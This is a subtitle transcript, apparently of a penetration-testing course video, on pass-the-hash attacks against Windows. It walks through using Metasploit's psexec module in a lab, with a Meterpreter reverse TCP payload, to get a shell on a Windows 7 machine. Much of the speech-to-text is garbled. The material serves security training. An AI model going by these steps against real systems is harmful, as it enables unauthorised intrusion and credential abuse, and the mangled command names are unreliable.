1 00:00:00,830 --> 00:00:08,630 Pass the hash is not a party game, nor is it a new attack if you aren't new in this field, you've 2 00:00:08,630 --> 00:00:10,370 probably heard about it a lot about it. 3 00:00:11,970 --> 00:00:14,840 It's ancient history, in fact, it dates back to 1997. 4 00:00:16,330 --> 00:00:19,750 But it is still valid for Windows operating system. 5 00:00:21,230 --> 00:00:25,880 Actually, it doesn't like a classic vulnerability that that I talked about earlier. 6 00:00:28,560 --> 00:00:33,600 What do you want me to say it it just helps you authenticate a remote system with a hash. 7 00:00:34,700 --> 00:00:39,590 So when you use this method, you don't need to crack or decrypt the hash. 8 00:00:40,510 --> 00:00:46,900 I know what you're thinking at first, it doesn't make sense that you can use a Windows hasher authentication 9 00:00:46,900 --> 00:00:47,410 remotely. 10 00:00:48,670 --> 00:00:52,780 So let me clarify what I'm saying here with an example. 11 00:00:53,910 --> 00:01:00,600 So let's assume that you've compromised a Windows machine by doing some fancy things and got an interpreter 12 00:01:00,600 --> 00:01:08,610 shell with a system or administrative privileges, and naturally you're going to dump the same hashes 13 00:01:08,610 --> 00:01:10,140 by using hash dump. 14 00:01:11,310 --> 00:01:17,570 And I don't mean that you always gain access to a system through some exploits or by using interpretor. 15 00:01:18,570 --> 00:01:27,120 In fact, you may extract hashes with other methods like AFG Dump, P.W. Dump or Kashdan shoulder, 16 00:01:27,120 --> 00:01:27,450 sir. 17 00:01:28,460 --> 00:01:31,480 Whatever way you accomplish it is fine. 18 00:01:32,900 --> 00:01:37,430 I remember once I even detached the hard drive of a client's machine to get the hashes. 19 00:01:38,280 --> 00:01:41,240 OK, so now you have the username and hash pairs. 20 00:01:42,100 --> 00:01:43,990 So what is next? 21 00:01:45,510 --> 00:01:51,210 If you're lucky, but especially if you have the time, you may know how to use rainbow tables to crack 22 00:01:51,210 --> 00:01:51,660 the hash. 23 00:01:53,200 --> 00:02:00,430 That doesn't seem unreasonable necessarily, but as I said before, and you'll hear me say it again 24 00:02:00,430 --> 00:02:04,690 in a penetration test, time is a very important factor. 25 00:02:05,950 --> 00:02:10,420 So at this point, let's talk about you and me, right, the human being. 26 00:02:11,320 --> 00:02:15,460 Now, there are lots and lots of digital platforms out there. 27 00:02:16,350 --> 00:02:24,840 And I don't know about you, there's all kinds of even articles published about it, but lots of people 28 00:02:24,960 --> 00:02:34,200 use the exact same passwords for everything they have everything they belong to, every device they 29 00:02:34,200 --> 00:02:34,490 own. 30 00:02:35,160 --> 00:02:35,670 So. 31 00:02:36,710 --> 00:02:41,570 Doesn't it make sense that they might share those credentials for their Windows authentication? 32 00:02:42,520 --> 00:02:45,190 Therefore, you don't need to crack the hash. 33 00:02:46,390 --> 00:02:52,180 And you will use it to check if the other targets on the network use the same hash and user pair. 34 00:02:53,460 --> 00:02:54,630 Isn't there a tool for this? 35 00:02:55,080 --> 00:03:05,880 Yes, there is a exact tool that's developed by Sess internals and this can check it for you so you 36 00:03:05,880 --> 00:03:12,120 can use this tool to examine the network for which targets have the same user hash pair. 37 00:03:13,420 --> 00:03:20,950 It uses the Windows File and print sharing service, which operates over the Protocol SMB to authenticate 38 00:03:20,950 --> 00:03:23,410 to other target hosts in the network. 39 00:03:24,590 --> 00:03:27,920 However, I think I even have a better solution. 40 00:03:28,890 --> 00:03:37,910 MSF, your Swiss Army knife, if you will, of hacking, you can use the MSF Pesek module. 41 00:03:38,790 --> 00:03:45,060 Now, one secret here that I want you to realize is this module, which is more stable than this is 42 00:03:45,060 --> 00:03:49,980 internal stool also enables you to enter the password itself. 43 00:03:51,220 --> 00:03:59,500 So if you are able to obtain and TLM password hash during your pen test, you can run the MSF exact 44 00:03:59,590 --> 00:04:00,100 module. 45 00:04:01,170 --> 00:04:03,140 So let's use it and see how it works. 46 00:04:05,110 --> 00:04:06,880 So let's go back to the MSF council. 47 00:04:08,040 --> 00:04:10,470 And let me choose the exact module. 48 00:04:11,820 --> 00:04:13,020 Use XPoint. 49 00:04:13,940 --> 00:04:14,540 Windows. 50 00:04:15,600 --> 00:04:16,410 SMB. 51 00:04:17,390 --> 00:04:18,500 He asked Zach. 52 00:04:19,670 --> 00:04:21,370 Show me the options. 53 00:04:23,080 --> 00:04:32,080 All right, so now you must set some variables, set our host to ten point ten to twelve for my Windows 54 00:04:32,080 --> 00:04:32,860 seven machine. 55 00:04:33,850 --> 00:04:35,140 Set our report to. 56 00:04:36,300 --> 00:04:38,490 All right, our ports already said. 57 00:04:40,120 --> 00:04:42,640 Set SMB user to vagrant. 58 00:04:46,040 --> 00:04:48,860 SAT assembly passed to vagrant again. 59 00:04:50,750 --> 00:04:59,210 OK, so you're allowed to use password hashes here, but you have cracked and got some clear text passwords 60 00:04:59,210 --> 00:04:59,840 to write. 61 00:05:00,870 --> 00:05:06,030 So then set payload to Windows Mature operator. 62 00:05:07,650 --> 00:05:08,960 Reverse TCP. 63 00:05:10,690 --> 00:05:11,560 Said Alehouse. 64 00:05:12,860 --> 00:05:14,660 To your colleague IP address. 65 00:05:17,990 --> 00:05:21,620 Said Airport two four four, four, five. 66 00:05:22,780 --> 00:05:25,720 So let's check one more time, show the options. 67 00:05:26,860 --> 00:05:29,620 Yeah, I think I've missed anything, so let's exploit. 68 00:05:33,490 --> 00:05:40,960 So the module's quickly executed and this session is open, look at the who am I on the target and bring 69 00:05:40,960 --> 00:05:42,520 the information about the target. 70 00:05:43,540 --> 00:05:46,240 And sure enough, we are on the Windows seven machine.